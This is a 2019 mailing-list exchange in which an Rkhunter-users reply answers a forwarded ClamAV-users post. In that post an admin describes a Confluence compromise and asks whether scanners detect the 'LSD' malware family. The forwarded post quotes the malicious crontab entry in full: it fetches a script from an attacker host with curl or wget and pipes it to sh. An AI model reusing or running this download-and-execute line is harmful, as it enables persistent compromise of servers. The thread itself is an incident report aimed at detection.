I'm sure it could be added eventually, but Rkhunter doesn’t use a database of signatures for situations like this. Each search is hard coded into the main process with with many months between releases. About the best that could be done would be to patch the developer version so that you could use it in advance of release if and when they have time to write the patch.
Software like ClamAV is much more agile and can turn out updates to their signature database in a day or so. Sent from my iPad -Al- On Apr 25, 2019, at 05:18, Brent Clark wrote: > Good day Guys > > I just came across the following on the Clamav mailinglist. > > Is this not something that can be added to rkhunters signature / database? > > Regards > Brent Clark > > > -------- Forwarded Message -------- > Subject: [clamav-users] LSD Malwares > Date: Thu, 25 Apr 2019 14:52:05 +0530 > From: Xavier Maysonnave via clamav-users <clamav-us...@lists.clamav.net> > Reply-To: ClamAV users ML <clamav-us...@lists.clamav.net> > To: clamav-us...@lists.clamav.net > CC: Xavier Maysonnave <x.maysonn...@gmail.com> > > > > Dear Friends, > > We recently faced an Atlassian Confluence issue lately. > Atlassian issued a security advisory the 29/03/2019 > <https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html>. > Following this thread > <https://community.atlassian.com/t5/Confluence-discussions/khugepageds-eating-all-of-the-CPU/td-p/1055337>, > We understood what happened on our server. > Confluence is running in its own user space and have seen its crontab hacked. > > On our Debian Stretch the 'crontab -u confluence -e' shows a non legit > instruction : > > */10 * * * * (curl -fsSL https://dd.heheda.tk/i.jpg||wget > <http://dd.heheda.tk/i.jpg||wget> -q -O- https://dd.heheda.tk/i.jpg)|sh > > > Obviously the security flaw in Confluence open the gate to this behaviour. > As we are running Confluence in its own user space, the i.jpg who contains > the shell script file didn't harm our server. No malwares have been deployed > however the server was shutting down immediately after starting. > > We cleaned up the crontab and upgraded Confluence to avoid any further > infection. > > However we need to check our installation and I'm wondering if ClamAV knows > already this malware family > <https://git.laucyun.com/security/lsd_malware_clean_tool/blob/master/README.md>. > I already open a report to ClamAV. is there any user who faced this issue > and is ClamAV ready to detect and cleanup our Linux boxes ? > > Any pointers about any informations about this LSD Malware family will be > greatly appreciated as I try to evaluate the risks for our infrastructure (I > checked various DB with no success and googled too). > > Warmly. > > Light > > Pudhuveedu / Xavier > > PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9 > <http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9> _______________________________________________ Rkhunter-users mailing list Rkhunter-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/rkhunter-users
